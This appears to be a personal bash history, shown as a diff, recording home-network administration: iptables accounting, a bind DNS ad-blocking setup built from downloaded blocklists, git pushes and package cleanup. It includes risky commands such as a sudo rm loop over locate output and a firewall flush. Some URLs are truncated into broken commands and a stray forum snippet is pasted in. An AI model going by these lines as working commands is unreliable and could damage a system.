/etc/apt/apt.conf.d/ +less /etc/apt/apt.conf.d/01autoremove-kernels +ls /etc/apt/apt.conf.d/ +less /etc/apt/apt.conf.d/00recommends +ls /etc/apt/apt.conf.d/ +less /etc/apt/apt.conf.d/01autoremove +ls /etc/apt/apt.conf.d/ +less /etc/apt/apt.conf.d/01-vendor-ubuntu +ls /etc/apt/apt.conf.d/ +less /etc/apt/apt.conf.d/20dbus +ls /etc/apt/apt.conf.d/ -a +ls /etc/apt/ +ls /etc/apt/preferences.d/ +less /etc/apt/preferences.d/official-extra-repositories.pref +ls /etc/apt/preferences.d/ +less /etc/apt/preferences.d/official-package-repositories.pref +ls /etc/apt/preferences.d/ +ls /etc/apt/ +less /etc/apt/sources.list +less /etc/apt/ +ls /etc/apt/ +less /etc/apt/apt.conf +man apt.conf +man apt_preferences +ls /usr/share/doc/apt +ls /usr/share/doc/apt/examples/ +less /usr/share/doc/apt/examples/apt.conf +less /usr/share/doc/apt/examples/ +ls +zcat configure-index.gz |less +less sources.list +la +la +ls ../apt-utils/ +less apt-ftparchive.conf +ls |grep apt +ls |grep apt +ps aux|less +ls -ltr +git status +la +l. +git status |less +git add .bash_history .bashrc .viminfo .kodi/userdata/guisettings.xml .kodi/userdata/upnpserver.xml +git commit -m "additions" +scp .bashrc thatonegi@github.com/ +less .gitconfig +less .git/config +scp .bashrc thatonegi@github.com/thatonegi/home.git +pkill -1 conky +pkill -9 conky +ssh -T git@github.com +git remote set url origin git@github.com:thatonegi/home.git +git dump +less .git +less .gitconfig +man git-config +h|grep remote +man git set +git remote -v +git remote set-url origin git@gitweb.com:thatonegi/home.git +git remote -v +git remote set-url origin git@github.com:thatonegi/home.git +git remote -v +git push +which git +la +vim dbback.sh +git status +qcd +git add .bash_history bin/dbback.sh +la +rm .dbback.sh.un~ +rm dbback.sh~ +l. +la +git commit -m "updated dbback to push backkups to git" +git status|less +git push +rm .*~ +la +crontab -l +sudo iptables-restore < /etc/iptables/rules.v4 +wiload.sh +sudo ifdown eth0 +sudo ifup eth0 +route +sudo ifup eth0 +pkill -QUIT evolution +sudo systemctl stop snmpd +sudo systemctl stop bind9 +sudo systemctl stop smbd +sudo systemctl stop nmbd +ps aux|less +log +nslookup cnn.com +sudo ifdown eth0 +sudo ifup eth0 +sudo iptables-restore < /etc/iptables/rules.v4 +sudo ifdown eth0 +sudo ifup eth0 +pkill -QUIT evolution +sudo systemctl stop snmpd +sudo systemctl stop bind9 +sudo systemctl stop smbd +sudo systemctl stop nmbd +dmesg +cat /etc/hosts +nslookup cnn.com +sudo iptables-restore < /etc/iptables/rules.v4 +sudo iptables -L +sudo iptables -t nat -L +wiload.sh +sudo iwconfig wlan0 essid "xfinitywifi" mode Managed channel 6 ap 06:1D:D5:70:E1:90 +sudo ifup eth0 +log +sudo sysctl -p +sudo ifdown eth0 +sudo dhclient eth0 +less .ssh/id_rsa.pub +sudo su - +sudo ifdown eth0 +sudo ifconfig eth0 down +sudo ifup eth0 +route +sudo route flush +ip route +man ip route +sudo ip route flush +man ip route +sudo ip route flush +sudo ip route flush all +ip route show +route +wiload.sh +route +sudo ifconfig eth0 down +sudo ifup eth0 +sudo ifdown eth0 +sudo ifup eth0 +route +sudo iptables-restore < /etc/iptables/rules.v4 +sudo apt-get update +sudo apt-get upgrade +sudo systemctl stop smbd +sudo systemctl stop nmbd +ps aux|less +pkill -QUIT evolution +sudo iptables-restore < /etc/iptables/rules.v4 +sudo vim /etc/hosts +host +dig cdns02.comcast.net +dig cdns03.comcast.net +nslookup +sudo iptables-restore < /etc/iptables/rules.v4 +sudo ifdown eth0 +wiload.sh +sudo ifup eth0 +log +sudo ifup eth0 +ki +sudo systemctl stop smbd +sudo systemctl stop nmbd +sudo systemctl stop bind9 +host +host +sudo vim /etc/hosts +sudo ifdown eth0 +sudo ifup eth0 +sudo ifdown eth0 +sudo ifup eth0 +sudo iptables-restore < /etc/iptables/rules.v4 +sudo apt-get update +sudo apt-get upgrade +sudo a2enmod proxy +sudo a2enmod proxy_http +sudo vim /etc/apache2/sites-available/000-default.conf +sudo cp /etc/apache2/sites-available/000-default.conf /etc/apache2/sites-available/openwrt-proxy.conf +cat /etc/apache2/sites-available/kodi-webserver.conf +vim /etc/apache2/sites-available/kodi-webserver.conf +sudo vim /etc/apache2/sites-available/kodi-webserver.conf +sudo systemctl restart apache2 +cat /etc/apache2/sites-available/kodi-webserver.conf +sudo vim /etc/iptables/rules.v4 +sudo su - +sudo iptables-restore < /etc/iptables/rules.v4 +sudo iptables -L +sudo vim /etc/iptables/rules.v4 +sudo iptables-restore < /etc/iptables/rules.v4 +sudo iptables -L +cat /etc/apache2/sites-available/kodi-webserver.conf +sudo vim /etc/apache2/sites-available/kodi-webserver.conf +sudo systemctl restart apache2 +cat /etc/hosts +l. /etc/apache2/sites-available/ +sudo rm /etc/apache2/sites-available/kodi-webserver.conf~ +sudo rm /etc/apache2/sites-available/.kodi-webserver.conf.un~ +l. /etc/apache2/sites-available/ +sudo vim /etc/apache2/sites-available/openwrt-proxy.conf +a2ensite openwrt-proxy +sudo a2ensite openwrt-proxy +ls /etc/apache2/sites-enabled/ +sudo systemctl restart apache2 +sudo su - +ls /etc/bind9 +ls /etc/named +ls /etc/bind +ls /etc/bind/zones.rfc1918 +less /etc/bind/zones.rfc1918 +ls /etc/bind +less /etc/bind/db.empty +nslookup +nslookup localhost +sudo iptables-restore < /etc/iptables/rules.v4 +sudo ifdown eth0 +sudo ifup eth0 +ls Backups/mysql/ +ls Backups/mysql/-k +ls Backups/mysql/ -k +ls Backups/mysql/ -l +ls Backups/mysql/ -ltr +crontab -e +crontab -l +crontab -l\e +crontab -e +sudo ifdown eth0 +sudo ifconfig eth0 down +sudo ifup eth0 +sudo systemctl restart smbd +sudo systemctl restart nmbd +sudo ifdown eth0 +sudo ifup eth0 +cat /etc/hosts +sudo iptables-restore < /etc/iptables/rules.v4 +sudo vim named.conf.local +less named.conf.options +sudo less named.conf.options +sudo su - +nslookup localhost +ls /var/cache/bind/tmp-yOPr5xqMtv +less /etc/bind/zones.rfc1918 +nslookup localhost +sudo su - +nslookup localhost +nslookup clock.xmission.com localhost +cat /etc/hosts +sudo vim /etc/bind/named.conf.local +sudo systemctl restart bind9 +sudo vim /etc/bind/named.conf.local +sudo systemctl restart bind9 +sudo ifdown eth0 +sudo ifup eth0 +sudo ifdown eth0 +sudo ifup eth0 +wiload.sh +sudo ifdown eth0 +sudo ifup eth0 +iftop +sudo apt-get install iftop +iftop -i eth0 +sudo iftop -i eth0 +ip neigbor +ip neig +ping +ip neig +ssh router +ssh root@router +sudo su - +sudo tail -f /var/log/named/query.log +log +wiload.sh +sudo ifup eth0 +sudo apt-get update +sudo apt-get upgrade +ip neig +sudo iptables -L -x -v -n +pkill -QUIT evolution +apr +apt-cache search bgp +sudo iptables -L -x -v -n +sudo iptables -L -x -v -n|less +shopt -p +help shopt +ip neigh +ip neigh|grep -v fe80 +ip neigh|grep eth0 +ip neigh|grep -v fe80|grep eth0 +ip neigh|grep -v fe80|grep eth0|awk '{ print $1 }' +ip neigh|grep -v fe80|grep eth0|awk '{ print $1 }'|sort -n +ip neigh|grep -v fe80|grep eth0|awk '{ print $1 }'|sort -n|sed '/(.10)/d +' +ip neigh|grep -v fe80|grep eth0|awk '{ print $1 }'|sort -n|sed '/(.10)/d' +ip neigh|grep -v fe80|grep eth0|awk '{ print $1 }'|sort -n|sed '/\(.10)/d' +ip neigh|grep -v fe80|grep eth0|awk '{ print $1 }'|sort -n|sed '/\(.10\)/d' +ip neigh|grep -v fe80|grep eth0|awk '{ print $1 }'|sort -n|sed '/\(.10$\)/d' +ip neigh|grep -v fe80|grep eth0|awk '{ print $1 }'|sort -n|sed '/\(\.10$\)/d' +ip neigh|grep -v fe80|grep eth0|awk '{ print $1 }'|sort -n|sed '/\(\.10\$\)/d' +ip neigh|grep -v fe80|grep eth0|awk '{ print $1 }'|sort -n|sed '/\(\.10$\)/d' +IPS=`ip neigh|grep -v fe80|grep eth0|awk '{ print $1 }'|sort -n|sed '/\(\.10$\)/d'` +echo $IPS +sud iptables -L ACCT_IN +sudo iptables -L ACCT_IN +sudo iptables -L -x -n -v +sudo iptables -L TRAFFIC_OUT +sudo iptables -L TRAFFIC_IN +sudo iptables -L -x -v -n|less +sudo iptables -L -n -v -x TRAFFIC_OUT +sudo iptables -L -x -v -n TRAFFIC_OUT +sudo iptables -L -x -v -n +ip neigh|grep -v fe80|grep eth0|awk '{ print $1 }'|sort -n|sed '/\(\.10$\)/d' +sudo iptables -L TRAFFIC_OUT +sudo iptables -L TRAFFIC_OUT|grep 192 +sudo cat /proc/net/arp +grep eth0 sudo cat /proc/net/arp +sudo cat /proc/net/arp |grep eth0 +sudo cat /proc/net/arp |grep eth0| sort - +sudo cat /proc/net/arp |grep eth0| sort -n +sudo iptables -L FORWARD --line-numbers +man iptables +sudo iptables -L FORWARD --line-numbers +sudo iptables -I 1 FORWARD -j TRAFFIC_IN +sudo iptables -I FORWARD 1 -j TRAFFIC_IN +sudo iptables -L FORWARD --line-numbers +sudo iptables -D FORWARD 3 +sudo iptables -L FORWARD --line-numbers +sudo vim /etc/iptables/rules.v4 +sudo iptables -I FORWARD 1 -i eth0 -j TRAFFIC_IN +sudo iptables -D FORWARD 2 +sudo iptables -L -n -v -x +man bash +sudo iptables -L -n -x -v +sudo less /etc/iptables/rules.v4 +echo $$BASHPID +echo $BASHPID +echo $$ +man bash +echo $BASHPID +echo $$ +bash +echo $$ +echo $BASHPID +grep eth0 /proc/net/arp +grep eth0 /proc/net/arp|sort -n +man bash +vim Downloads/wrtbwmon.sh +sudo less /etc/iptables/rules.v4 +vim Downloads/wrtbwmon.sh +sudo less /etc/iptables/rules.v4 +vim Downloads/wrtbwmon.sh +sudo less /etc/iptables/rules.v4 +man sudo +vim .bashrc +export SUDO_EDITOR=vim +sudo less /etc/iptables/rules.v4 +sudo su - +sudo less /etc/iptables/rules.v4 +man less +sudo less /etc/iptables/rules.v4 +sudo vim /etc/iptables/rules.v4 +h|grep sed +sudo su u- +sudo su - +sudo iptables -L +ip neigh|grep -v fe80|grep eth0|awk '{ print $1 }'|sort -n|sed '/\(\.10$\)/d' +sudo iptables -L TRAFFIC_OUT +sudo iptables -L TRAFFIC_OUT -n +man iptables +sudo iptables -L TRAFFIC_OUT -n -v +sudo iptables -L TRAFFIC_OUT -n -v -x +sudo iptables -L TRAFFIC_OUT -n -v +sudo iptables -L TRAFFIC_OUT -n -v|grep all +sudo iptables -L TRAFFIC_OUT -n -v|grep 192 +sudo iptables -L TRAFFIC_OUT -n -v|grep 192|awk '{ print $8 }' +sudo iptables -L TRAFFIC_OUT -n -v|grep 192|awk '{ print $8 }'|sort -n +wc -l $IPS +man wc +wc -l $(echo $IPS) +echo $IPS +ip neigh|grep -v fe80|grep eth0|awk '{ print $1 }'|sort -n|sed '/\(\.10$\)/d' +IPS=`ip neigh|grep -v fe80|grep eth0|awk '{ print $1 }'|sort -n|sed '/\(\.10$\)/d'` +wc -l $(echo $IPS) +echo $IPS +echo $IPS|wc -l +echo $IPS|wc -n +man wc +echo $IPS|wc -s +echo $IPS|wc -w +ip neigh|grep -v fe80|grep eth0|awk '{ print $1 }'|sort -n|sed '/\(\.10$\)/d' +sudo iptables -L TRAFFIC_OUT -n -v|grep 192|awk '{ print $8 }'|sort -n +echo $IPS +RULES=`sudo iptables -L TRAFFIC_OUT -n -v|grep 192|awk '{ print $8 }'|sort -n` +echo $RULES +vim Downloads/wrtbwmon.sh +iptables -L FORWARD --line-numbers -n +sudo iptables -L FORWARD --line-numbers -n +vim bin/ipacct.sh +nvram +ls /proc/ +ls /proc/net/ +cat /proc/net/dev +cat /proc/net/wireless +vim bin/ipacct.sh +man wget +wget -O Download/filname.shsti.net.nz/~robin/wrtbwmon +man wget +wget -O Download/filname.shsti.net.nz/~robin/wrtbwmon +wget -O Download/filname.sh -bsti.net.nz/~robin/wrtbwmon +man wget +wget -O Download/filname.sh -Bsti.net.nz/~robin/wrtbwmon +man wget +less /etc/wgetrc +man wgetrc +ls /usr/share/wget +ls /usr/share/ +ls /usr/share/wg +wget +wget ~~help +wget --help +wget -o file -O Download/filname.sh -Bsti.net.nz/~robin/wrtbwmon +wget -o file -O Download/filname.shsti.net.nz/~robin/wrtbwmon +wget -m -O Download/filname.shsti.net.nz/~robin/wrtbwmon +wget -msti.net.nz/~robin/wrtbwmon -O Downloads/file.sh +less Downloads/file.sh +git status +git status|less +git add .bash_history .viminfo .biglist.p2p +git commit -m "updates" +git push +sudo updatedb +locate *~ +for file in `locate *~`;do sudo rm $file;done +sudo updatedb +locate *~ +sudo su - +lcear +rm wget-log +rm file +elar +lear +vim bin/ipacct.sh +chmod +x ipacct.sh +rm ipacct.sh~ +rm .ipacct.sh.un~ +la +sudo ./ipacct.sh +sudo ./ipacct.sh update +vim ipacct.sh +man bash +set -x +sudo ./ipacct.sh update +vim ipacct.sh +./ipacct.sh +./ipacct.sh update eth0 +./ipacct.sh update +vim ipacct.sh +./ipacct.sh update +vim ipacct.sh +./ipacct.sh update +vim ipacct.sh +./ipacct.sh update +vim ipacct.sh +./ipacct.sh update +less ipacct.sh +grep eth0 /proc/net/arp | sort -n | sed '/\(\.10$\)/d' +grep eth0 /proc/net/arp | sort -n | sed '/\(\.10\)/d' +grep eth0 /proc/net/arp | sort -n | sed '/\(\.10\ \)/d' +cat /proc/net/arp +cat /proc/net/arp | grep eth0 | sort -n +grep eth0 /proc/net/arp | sort -n | sed '/\(\.10\ \)/d' +vim ipacct.sh +./ipacct.sh update +vim ipacct.sh +./ipacct.sh update +vim ipacct.sh +sudo ./ipacct.sh +sudo ./ipacct.sh update +vim ipacct.sh +sudo ./ipacct.sh update +iptables -L -n -v -x +sudo iptables -L -n -v -x +sudo vim /etc/iptables/rules.v4 +sudo su - +vim ipacct.sh +sudo ipacct.sh update eth0 +sudo ./ipacct.sh update eth0 +sudo iptables -L -n -v -x +sudo su +rm *~ +rm .ipacct.sh.un~ +la +iptables -L +sudo iptables -L +sudo iptables -L -n -v -x +sudo vim /etc/iptables/rules.v4 +sudo iptables -L -n -v -x +sudo iptables -L -n -v +git status +git add directory.py gdrive.py iface.py ipacct.sh ratelimit whatsmyip.pl +git add .bashrc .bash_history .viminfo +git commit -m "updates and additions" +git push +updatedb +sudo updatedb +locate *~ +rm ..bashrc.un~ .bashrc~ +la +sudo iptables -L -n -v -x +sudo iptables -L -n -v +dig @a.root-servers.net . ns +curl +tail -f .kodi/temp/kodi.log +man tput +linkss.com +linkss.com +vim .bashrc +wgetsercontent.com/nachoparker/xcol/xcol_bash/xcol.sh -O Downloads/xcol.sh +less Downloads/xcol.sh +vim .bashrc +less .LESS_TERMCAP +vim .LESS_TERMCAP +vim .bashrc +man bash +vim .bashrc +ls .. +ls ../bin/ +ls ../Pr0n/ +ll ../Pr0n/ +chmod 644 ../Pr0n/vl_240P_254.0k_8177231.mp4 +ll ../Pr0n/ +mv *.mp4 ../Pr0n/ +ls -R +chmod 0644 Active\ Duty\ 17/Hard\ Corps\ 2004\ \[Active\ Duty\].m4v +ls -R +chmod 644 Active\ Duty\ 17/Hard\ Corps\ 2004\ \[Active\ Duty\].m4v +ls -R +sudo iptables -L -nxv +vim .bashrc +grep eth0 /proc/net/arp | sort -n | sed '/\(\.10\ \)/d' +grep eth0 /proc/net/arp | sort -n | sed '/\(\.10\ \)/d'|xcol +grep eth0 /proc/net/arp | sort -n | sed '/\(\.10\ \)/d'|xcol 192 +grep eth0 /proc/net/arp | sort -n | sed '/\(\.10\ \)/d'|xcol 192 * eth0 +grep eth0 /proc/net/arp | sort -n | sed '/\(\.10\ \)/d'|xcol 192 \* eth0 +vim .bashrc +grep eth0 /proc/net/arp | sort -n | sed '/\(\.10\ \)/d'|xcol 192 \* eth0 +grep eth0 /proc/net/arp | sort -n | sed '/\(\.10\ \)/d' +grep eth0 /proc/net/arp +grep eth0 /proc/net/arp | sort -n +ssh root@router +cat /proc/net/arp +ifconfig +cat /proc/net/arp +nmap -sT +nmap -sT +sudo nmap -sT +cat /proc/net/arp +sudo iptables -L -n -v -x +cat /proc/net/arp | grep eth0 +cat /proc/net/arp | grep eth0|sort -n +sudo iptables -L -n -v -x +cat /proc/net/arp | grep eth0|sort -n +sudo bin/ipacct.sh +cat /proc/net/arp | grep eth0|sort -n +sudo iptables -L -n -v -x +vim bin/ipacct.sh +sudo bin/ipacct.sh +sudo bin/ipacct.sh update +sudo iptables -L -n -v -x +sudo su - +vim bin/ipacct.sh +less Downloads/wrtbwmon.sh +vim bin/ipacct.sh +less Downloads/wrtbwmon.sh +cat /proc/net/arp +cat /proc/net/arp | grep -v "0x0" +less Downloads/wrtbwmon.sh +ls /bin/ +ls bin +rm *Problem with script arguments in crontab | Unix Linux Forums | HP-UX +stems › HP-UX +Nov 23, 2010 - 4 posts - ‎2 authors +I have a script scheduled in cron as shown below. 16 12 * * * /users/mydir/bin/process_master.ksh `date '+%Y%m%d'` >> /users/mydir/process_master.out. This script executes correctly when invoked on command line, but doesn't work the same when scheduled in crontab. Crontab is working fine with other ... +[ubuntu] Passing command line parameters in a cron job - Ubuntu Forums +s.org/showthread.php?t=2182373 + +rm *~ +la +rm .ipacct.sh.un~ +la +rm kodi_crashlog-20180228_034404.log +la +l. +la +l. +rm .LESS_TERMCAP~ +rm ..LESS_TERMCAP.un~ +l. +la +l. +la +cat cron.log +which iptables +sudo su - +tail -f cron.log +which sed +which sort +which grep +sudo s - +sudo su - +tail cron.log +tail cron.log -f +sudo iptables -L -nxv +sudo su - +wiload.sh +sudo ifdown eth0 +sudo ifup eth0 +sudo iptables -L -nxv +sudo iptables -L -nv +ip neigh +cat /proc/net/arp +ip neigh flush +man ip neigh +man ip-neighbor +man ip-neighbour +ip neigh flush eth0 +ip neigh flush dev eth0 +sudo ip neigh flush dev eth0 +cat /proc/net/arp +ip neigh +cat /proc/net/arp +ls /sys/kernel/debug/ +sudo su - +sudo systemctl stop nmbd +sudo systemctl stop smbd +sudo apt-get update +sudo systemctl stop nmbd +sudo systemctl stop smbd +sudo iptables -Lnvx +sudo iptables -L -nvx +sudo iptables -F +sudo iptables -L -nvx +sudo iptables -t nat -L -nvx +sudo iptables -t nat -Z +sudo iptables -t nat -L -nvx +sudo /etc/init.d/wicd restart +wiload.sh +sudo iwconfig wlan0 essid "xfinitywifi" mode Managed channel 6 ap 06:1D:D5:70:E1:90 +wiload.sh +sudo ifdown eth0 +sudo ifup eth0 +sudo iptables-restore < /etc/iptables/rules.v4 +sudo bin/ipacct.sh setup +sudo apt-get update +sudo apt-get upgrade +apt-cache search "pi hole" +apt-cache search pihole +git clone --depth 1 +less adlists.default +less ad_servers.txt +man hosts +ls -h +ls -lh +ls /etc/bind/ +s +less db.127 +less zones.rfc1918 +sudo vim zone.ads +cat adlists.default +wgetsercontent.com/StevenBlack/hosts/master/hosts +less hosts +grep "" hosts +grep "" hosts|sed '/\^\#/d' +grep "" hosts|sed 'd/\^\#/g' +grep "" hosts|sed '/\(\^\#\)/d' +grep "" hosts|sed '/\(^\#\)/d' +grep "" hosts|sed '/\(^\#\)/d'|awk '{ print $1;"\t";print $2 }' +grep "" hosts|sed '/\(^\#\)/d'|awk '{ print $1"\t"print $2 }' +grep "" hosts|sed '/\(^\#\)/d'|awk '{ print $1"\t"$2 }' +grep "" hosts|sed '/\(^\#\)/d'|awk '{ print $1"\t\t"$2 }' +grep "" hosts|sed '/\(^\#\)/d'|awk '{ print $1"\t\t"$2 }' >~/tmp/hosts +less ad_servers.txt +cp ad_servers.txt ~/tmp/ +less adlists.default +wgets.com/files/justdomains +cat justdomains +cp justdomains ~/tmp +cat adlists.default +wgetstracker.abuse.ch/blocklist.php?download=domainblocklist +mv blocklist.php\?download\=domainblocklist domain-blocklist +cat domain-blocklist +cat adlists.default +curls3.amazonaws.com/lists.disconnect.me/simple_tracking.txt +curls3.amazonaws.com/lists.disconnect.me/simple_tracking.txt > tracking +cat adlists.default +curls3.amazonaws.com/lists.disconnect.me/simple_ad.txt +curls3.amazonaws.com/lists.disconnect.me/simple_ad.txt >simple_ad.txt +cat adlists.default +curlsysctl.org/cameleon/hosts +curlsysctl.org/cameleon/hosts > cameleon.hosts +lh +ls -lhtr +cat ad_servers.txt +touch ad_servers.txt cameleon.hosts domain-blocklist hosts justdomains simple_ad.txt tracking +ls -ltr +cat adlists.default +ls -ltr +less ad_servers.txt +vim ~/.bashrc +ls /etc/bind/*.zone +nslookup arstechnica.com localhost +nslookup businessinsider.com localhost +nslookup slashdot.org localhost +sudo vim /etc/bind/named.conf.local +sudo ifup eth0 +sudo iptables -L -nvx +for host in `grep 127 ad_servers.txt | awk '{ print $2 }'`;do echo $host;done +for host in `grep 127 ad_servers.txt | awk '{ print $2 }'`;do echo $host;done|less +for host in `grep 127 ad_servers.txt | grep -v localhost | awk '{ print $2 }'`;do echo $host;done|less +vim ad_servers.txt +for host in `grep 127 ad_servers.txt | awk '{ print $2 }'`;do echo $host;done|less +for host in `grep 127 ad_servers.txt | awk '{ print $2 }'`;do printf("zone \"%s\" { type master; notify no; file \"null.zone.file\"; };", ${host});done +for host in `grep 127 ad_servers.txt | awk '{ print $2 }'`;do printf("zone \"%s\" { type master; notify no; file \"null.zone.file\"; };", $host);done +for host in `grep 127 ad_servers.txt | awk '{ print $2 }'`;do printf "zone \"%s\" { type master; notify no; file \"null.zone.file\"; };", $host;done +for host in `grep 127 ad_servers.txt | awk '{ print $2 }'`;do printf "zone \"%s\" { type master; notify no; file \"null.zone.file\"; }; +", $host;done +for host in `grep 127 ad_servers.txt | awk '{ print $2 }'`;do printf "zone \"%%s\" { type master; notify no; file \"null.zone.file\"; }; +", $host;done +for host in `grep 127 ad_servers.txt | awk '{ print $2 }'`;do printf "zone \"%s\" { type master; notify no; file \"null.zone.file\"; }; +", $host;done +for host in `grep 127 ad_servers.txt | awk '{ print $2 }'`;do printf "zone \"%s\" { type master; notify no; file \"null.zone.file\"; }; +", "$host";done +for host in `grep 127 ad_servers.txt | awk '{ print $2 }'`;do printf "zone \"%s\" { type master; notify no; file \"null.zone.file\"; }; +", "$host";done|less +vim ad_servers.txt +mv ad_servers.txt ad_servers1.txt +strings ad_servers1.txt > ads.txt +cat ads.txt +for host in `grep 127 ads.txt | awk '{ print $2 }'`;do printf "zone \"%s\" { type master; notify no; file \"null.zone.file\"; }; +", "$host";done|less +for host in `grep 127 ads.txt | awk '{ print $2 }'`;do printf "zone \"%s\" { type master; notify no; file \"null.zone.file\"; }; +" $host;done|less +for host in `grep 127 ads.txt | awk '{ print $2 }'`;do printf "zone \"%s\" { type master; notify no; file \"null.zone.file\"; }; +" $host;done +for host in `grep 127 ads.txt | awk '{ print $2 }'`;do printf "zone \"%s\" { type master; notify no; file \"null.zone.file\"; }; +" $host;done >> adservers.zone +less adservers.zone +ls -ltr +rm *~ +rm .*~ +l. +ls -ltr +mv ads.txt ad_servers.txt +rm ad_servers1.txt +l. +ls -ltr +less tracking +ls -ltr +vim tracking +strings tracking > newtracking +vim newtracking +for host in newtracking;do printf "zone \"%s\" { type master; notify no; file \"null.zone.file\"; }; +" $host;done +for host in $(cat newtracking);do printf "zone \"%s\" { type master; notify no; file \"null.zone.file\"; }; +" $host;done +for host in $(cat newtracking);do printf "zone \"%s\" { type master; notify no; file \"null.zone.file\"; }; +" $host;done>> tracking.zone +ls -ltr +rm *~ +rm .*~ +la +ls -ltr +less simple_ad.txt +strings simple_ad.txt > simple_ad +vim simple_ad +for host in $(cat simple_ad);do printf "zone \"%s\" { type master; notify no; file \"null.zone.file\"; }; +" $host;done +for host in $(cat simple_ad);do printf "zone \"%s\" { type master; notify no; file \"null.zone.file\"; }; +" $host;done >> simplead.zone +ls -ltr +rm simple_ad~ +rm .simple_ad.un~ +cat justdomains +strings justdomains > just.domains +vim just.domains +rm just.domains +strings justdomains | sort -n > just.domains +vim just.domains +for host in $(cat just.domains);do printf "zone \"%s\" { type master; notify no; file \"null.zone.file\"; }; +" $host;done +for host in $(cat just.domains);do printf "zone \"%s\" { type master; notify no; file \"null.zone.file\"; }; +" $host;done >> justdomains.zone +ls -ltr +cat hosts +cat hosts |less +grep "" hosts +grep "" hosts |less +vim hosts +grep "" hosts |less +grep "" hosts |sed '/^\#/d' +grep "" hosts |sed '/^\#/d'|awk '{ print $2 }'|sort -n |string > host +grep "" hosts |sed '/^\#/d'|awk '{ print $2 }'|sort -n |strings > host +rm host +grep "" hosts |sed '/^\#/d'|awk '{ print $2 }'|sort -n |strings > host +cat host|less +for host in $(cat host);do printf "zone \"%s\" { type master; notify no; file \"null.zone.file\"; }; +" $host;done +for host in $(cat host);do printf "zone \"%s\" { type master; notify no; file \"null.zone.file\"; }; +" $host;done >> hosts.zone +ls -ltr +rm host~ +rm hosts~ +rm .hosts.un~ +l. +touch *.zone +ls -ltr +cat domain-blocklist +vim domain-blocklist +cat domain-blocklist|sort -n +cat domain-blocklist|sort -n|strings >blocklist +for host in $(cat blocklist);do printf "zone \"%s\" { type master; notify no; file \"null.zone.file\"; }; +" $host;done >> blocklist.zone +cat blocklist.zone +ls -ltr +vim cameleon.hosts +cat cameleon.hosts | awk '{ print $2 }' | sort -n |strings > cameleon +cat cameleon +for host in $(cat cameleon);do printf "zone \"%s\" { type master; notify no; file \"null.zone.file\"; }; +" $host;done >> cameleon.zone +cat cameleon.zone +touch *.zone +ls -otr +ls -ltr +sudo cp *.zone /etc/bind +less named.conf.local +ls *.zone +sudo vim named.conf.local +sudo ls /etc/bind/*.zone +sudo ls /etc/bind/*.zone >> named.conf.local +sudo su +rndc --gelp +man -k rndc +rndc-confgen --help +sudo su - +vim .bash_aliases +sudo rndc stats +. .bash_aliases +bstat +bstats +less /etc/bind/rndc.key +sudo less /etc/bind/rndc.key +man rndc.conf +sudo less /etc/bind/rndc.key +nslookup trimet.org localhost +nslookup trimet.org +nslookup trimet.org localhost +sudo rndc reload +nslookup trimet.org localhost +nslookup trimet.org +sudo vim /etc/bind/named.conf.local +sudo vim /etc/bind/named.conf.options +sudo rndc reload +nslookup trimet.org localhost +sudo rndc status +sudo rndc stats +bstats +sudo netstat -plant|less +nslookup trimet.org localhost +nslookup trimet.org +nslookup trimet.org +cat /etc/resolv.conf +sudo rndc stats +sudo rndc status +vim .bash_aliases +. .bash_aliases +dmesg +sudo vim /etc/sysctl.conf +sudo sysctl -p +dmesg +pkill -QUIT evolution +sudo apt list installed +sudo apt list --installed +list +vim .bash_aliases +. .bash_aliases +list +ls Videos/ +sudo dpkg --list | grep -i linux-image +sudo apt-get --purge remove linux-image-4.13.0-26-generic +sudo dpkg --list | grep -i linux-image +sudo apt-get --purge remove linux-image-extra-4.4.0-53-generic linux-image-extra-4.4.0-64-generic linux-image-extra-4.4.0-66-generic linux-image-extra-4.4.0-67-generic linux-image-extra-4.8.0-54-generic +sudo dpkg --list | grep -i linux-image +host myip.opendns.com +host myip.opendns.com resolver.opendns.com +host myip.opendns.com resolver1.opendns.com +dig +short myip.opendns.com @resolver1.opendns.com +vim ~/.bash_aliases +dig TXT +short o-o.myaddr.1.google.com @ns1.google.com +vim ~/.bash_aliases +curl ifconfig.me +vim ~/.bashrc +day=$(TZ=PST-24 date +%d) +echo $day +hwinfo +hwinfo --shory +hwinfo --short +sudo sysctl -p +sudo ifdown eth0 +sudo ifup eth0 +sudo ifdown eth0 +sudo ifup eth0 +sudo sysctl -p +sudo apt-get update +sudo apt-get upgrade +sudo iptables -L -nvx +sudo iptables -L -nv +ip neigh +sudo iptables -L -nv +sudo ifdown eth0 +sudo ifup eth9 +sudo ifup eth0 +sudo iptables-restore < /etc/iptables/rules.v4 +sudo sysctl -p +;p +sudo ./bin/ipacct.sh setup +sudo ./bin/ipacct.sh update eth0 +sudo iptables -L -nvx +sudo ./bin/ipacct.sh update eth0 +sudo iptables -L -nvx +sudo ifup eth0 +sudo ./bin/ipacct.sh update eth0 +sudo iptables -L -nvx +pkill -QUIT evolution +route +ip neigh +cat /etc/hosts +sudo updatedb +locate *~ +for file in `locate *~`;do echo $file;done +for file in `locate *~`;do sudo \rm $file;done +sudo updatedb +locate *~ +l. bin +set +env +clar +sudo iptables -L -nvx +rm cron.log +ls /var/log/ +ls /var/cache/ +ls /var/cache/bind/ +ls /var/cache/samba/ +ls /var/cache/fwupdate/ +ls /var/cache/apt +ls /var/cache/apt/archives/ +ll /var/cache/apt/archives/ +sudo lockfile-remove /var/cache/apt/lock +ll /var/cache/apt +ll /var/cache/apt/archives/ +sudo lockfile-remove /var/cache/apt/archives/lock +ll /var/cache/apt/archives/ +sudo rm /var/cache/apt/archives/lock +ll /var/cache/apt/archives/ +ll /var/cache/apt/archives/partial/ +sudo ll /var/cache/apt/archives/partial/ +sudo ls -l /var/cache/apt/archives/partial/ +sudo apt-get clean autoclean +ll /var/cache/apt/archives/ +ls /var/ +ls /var/spool/ +ls /var/lib/ +ls /var/lib/apt +ls /var/lib/apt/lists/ +ls /var/lib/ +ls /var/lib/dpkg/ +ls /var/lib/dpkg/updates/ +du -sk /var/lib/* +sudo du -sk /var/lib/* +sudo su - +sudo apt-get update +nslookup master.dl.sourceforge.net +sudo apt-get update +sudo iptables-restore < /etc/iptables/rules.v4 +sudo sysctl -p +sudo apt-get update +sudo ifdown eth0 +sudo apt-cache search pdf +ps aux | less +sudo iptables -L -nvx +sudo ./bin/ipacct.sh setup +sudo ./bin/ipacct.sh update eth0 +sudo iptables -L -nvx +sudo ./bin/ipacct.sh update eth0 +sudo ./bin/ipacct.sh update +s +sudo dmesg +ls /tmp/ +makewhatis +sudo apt-cache search makewhatis +sudo apt-cache search whatis +sudo man-db +sudo apt-get install man2html +apt-cache search pdf +apt-cache search 